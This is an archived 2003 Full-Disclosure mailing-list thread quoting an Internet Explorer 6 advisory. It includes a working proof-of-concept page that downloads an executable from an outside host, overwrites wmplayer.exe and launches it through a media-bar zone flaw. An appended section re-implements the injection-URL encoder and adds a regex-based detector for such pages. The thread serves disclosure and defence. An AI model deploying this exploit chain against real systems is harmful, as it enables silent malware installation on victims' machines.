From: jkuperus at planet.nl (jelmer)
Subject: Internet Explorer 6 on Windows XP allows execution of arbitrary code

When viewing mail in recent versions of Outlook it operates in the
Restricted zone, e.g. no active scripting is allowed to run, so these won't be
exploitable.
Unless someone proves otherwise, that is ;)



----- Original Message ----- 
From: "Kristian Hermansen" <khermansen@...technology.com>
To: "Full Disclosure" <full-disclosure@...ts.netsys.com>
Sent: Friday, September 12, 2003 2:40 AM
Subject: Re: [Full-Disclosure] Internet Explorer 6 on Windows XP allows execution of arbitrary code


> Wow, this one is pretty scary.  Nice work putting it together.  Does
> anyone know if Outlook is exploitable with this?  I'd think that Outlook
> would not try to play the media file, but I'm not quite sure.  Wow, what a
> rush of pretty critical bugs lately!!!
>
> Kris Hermansen
>
>
> ----- Original Message ----- 
> From: "jelmer" <jkuperus@...net.nl>
> To: <bugtraq@...urityfocus.com>
> Cc: <full-disclosure@...ts.netsys.com>
> Sent: Thursday, September 11, 2003 6:31 PM
> Subject: [Full-Disclosure] Internet Explorer 6 on Windows XP allows execution of arbitrary code
>
>
> > Internet Explorer 6 on Windows XP allows execution of arbitrary code
> >
> > DESCRIPTION :
> >
> > Yesterday Liu Die Yu released a series of advisories concerning Internet
> > Explorer. By combining one of these issues with an earlier issue I myself
> > reported a while back, you can construct a specially crafted webpage that
> > can take any action on a user's system, including but not limited to
> > installing trojans, keyloggers, wiping the user's hard drive, etc.
> >
> >
> > TECHNICAL EXPLANATION :
> >
> > Internet Explorer 6 comes with a media sidebar in which you can load and
> > play media clips without even leaving the browser. When you instruct the
> > media bar to load a file from an unknown host, or the HTTP status returned
> > by an existing host indicates an error, the media bar displays an error
> > page inside the media bar, namely
> >
> > res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path
> >
> > res URLs are treated as being in the "My Computer" zone and are loaded
> > from the user's filesystem, perfect conditions for the issue I describe on
> >
> > http://www.mail-archive.com/full-disclosure@lists.netsys.com/msg06791.html
> >
> > to work. Now all that is needed is a way to inject this exploit code into
> > this page. This method was graciously provided by Liu Die Yu, as you can
> > read on
> >
> > http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0
> >
> > Combining these issues we get something like :
> >
> > --snip--
> >
> > <textarea id="code" style="display:none;">
> >
> >     var x = new ActiveXObject("Microsoft.XMLHTTP");
> >     x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
> >     x.Send();
> >
> >     var s = new ActiveXObject("ADODB.Stream");
> >     s.Mode = 3;
> >     s.Type = 1;
> >     s.Open();
> >     s.Write(x.responseBody);
> >
> >     s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
> >     location.href = "mms://";
> >
> > </textarea>
> >
> > <script language="javascript">
> >
> >     // escape the payload so it survives inside file:javascript:eval('...')
> >     function preparecode(code) {
> >         result = '';
> >         lines = code.split(/\r\n/);
> >         for (i=0;i<lines.length;i++) {
> >
> >             line = lines[i];
> >             line = line.replace(/^\s+/,"");
> >             line = line.replace(/\s+$/,"");
> >             line = line.replace(/'/g,"\\'");
> >             line = line.replace(/[\\]/g,"\\\\");
> >             line = line.replace(/[/]/g,"%2f");
> >
> >             if (line != '') {
> >                 result += line +'\\r\\n';
> >             }
> >         }
> >         return result;
> >     }
> >
> >     // inject the payload into the media bar, which by now holds the res:// error page
> >     function doit() {
> >         mycode = preparecode(document.all.code.value);
> >         myURL = "file:javascript:eval('" + mycode + "')";
> >         window.open(myURL,"_media")
> >     }
> >
> >     // make the media bar's load fail so it falls back to the res:// error page
> >     window.open("error.jsp","_media");
> >
> >     setTimeout("doit()", 5000);
> >
> >
> > </script>
> >
> > --snip--
> >
> > error.jsp is a JSP page that consists of one line, namely
> >
> > <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>
> >
> >
> > DEMONSTRATION :
> >
> > A demonstration is provided at :
> >
> > http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
> >
> >
> > WORKAROUND :
> >
> > Disable active scripting or do "the sensible thing" and pick another
> > browser such as the excellent Mozilla Firebird.
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
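The chain quoted above has two parts a defender can act on: the encoding step that folds the dropper into a file:javascript: URL aimed at the "_media" target, and the fixed set of ingredients (XMLHTTP download, ADODB.Stream write, SaveToFile) that any page using it must carry. The following is an added example written for this archive page, not code from the advisory or from either poster: it re-implements the encoding step as a pure function (escaping backslashes before single quotes, the reverse of the PoC's order, so quoted payloads also survive) and pairs it with a content check that a proxy or mail gateway could run over HTML. The function names prepareCode, buildInjectionUrl, scanHtml and isSuspicious, the INDICATORS list, and both sample pages (including the example.invalid host) are constructed for this example.

```javascript
// Added example, not part of the advisory: pure re-implementation of the PoC's
// payload-encoding step plus a content-inspection check for pages that combine
// the same ingredients. All sample HTML below is constructed for this example.

// Encode a block of JScript for embedding inside file:javascript:eval('...'):
// trim each line, escape backslashes and single quotes for the single-quoted
// string, percent-encode "/" so the URL parser does not treat it as a path
// separator, and join lines with a literal \r\n escape that eval() turns back
// into line breaks. Backslashes are escaped before quotes; the PoC does it the
// other way round, which only works because its payload has no single quotes.
function prepareCode(code) {
  let result = "";
  for (let line of code.split(/\r?\n/)) {
    line = line.trim();
    line = line.replace(/\\/g, "\\\\");
    line = line.replace(/'/g, "\\'");
    line = line.replace(/\//g, "%2f");
    if (line !== "") result += line + "\\r\\n";
  }
  return result;
}

// The URL the PoC opens into the "_media" target once the media bar is
// showing the res:// error page (My Computer zone).
function buildInjectionUrl(code) {
  return "file:javascript:eval('" + prepareCode(code) + "')";
}

// Indicators of the chain: the media-bar target, the file:javascript: vector,
// a res:// reference, and the XMLHTTP + ADODB.Stream dropper that writes a
// downloaded binary to disk.
const INDICATORS = [
  { name: "media-bar target",    re: /window\.open\s*\([^)]*["']_media["']/i },
  { name: "file:javascript url", re: /file:javascript:/i },
  { name: "res url",             re: /res:\/\//i },
  { name: "xmlhttp download",    re: /ActiveXObject\s*\(\s*["']Microsoft\.XMLHTTP["']\s*\)/i },
  { name: "adodb stream",        re: /ActiveXObject\s*\(\s*["']ADODB\.Stream["']\s*\)/i },
  { name: "savetofile",          re: /\.SaveToFile\s*\(/i },
];

// Names of every indicator present in the page, in INDICATORS order.
function scanHtml(html) {
  return INDICATORS.filter((ind) => ind.re.test(html)).map((ind) => ind.name);
}

// Flag a page only when an injection vector is paired with a drop-to-disk
// primitive; a bare res:// link or ADODB.Stream reference alone is too noisy.
function isSuspicious(html) {
  const hits = scanHtml(html);
  const vector = hits.includes("media-bar target") || hits.includes("file:javascript url");
  const dropper = hits.includes("adodb stream") || hits.includes("savetofile");
  return vector && dropper;
}

// Constructed sample: the skeleton of the PoC with a placeholder payload host.
// Note it never spells out a res:// URL (the media bar navigates there itself),
// so scanHtml reports five of the six indicators.
const SAMPLE_EXPLOIT_PAGE = `
<textarea id="code" style="display:none;">
  var x = new ActiveXObject("Microsoft.XMLHTTP");
  x.Open("GET", "http://example.invalid/1.exe", 0);
  var s = new ActiveXObject("ADODB.Stream");
  s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe", 2);
</textarea>
<script>
  window.open("error.jsp", "_media");
  setTimeout(function () {
    window.open("file:javascript:eval('" + document.all.code.value + "')", "_media");
  }, 5000);
</script>`;

// Constructed sample: a benign page that merely links to a res:// resource.
const SAMPLE_BENIGN_PAGE =
  `<a href="res://C:\\WINDOWS\\System32\\browselc.dll/mb404.htm">help</a>`;

console.log("exploit sample:", scanHtml(SAMPLE_EXPLOIT_PAGE), isSuspicious(SAMPLE_EXPLOIT_PAGE));
console.log("benign sample:", scanHtml(SAMPLE_BENIGN_PAGE), isSuspicious(SAMPLE_BENIGN_PAGE));
```

The two-part rule in isSuspicious is deliberate: res:// links and ADODB.Stream appear in legitimate pages of that era, but a page that both retargets the "_media" frame (or emits a file:javascript: URL) and writes a fetched body to disk has no benign reading.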

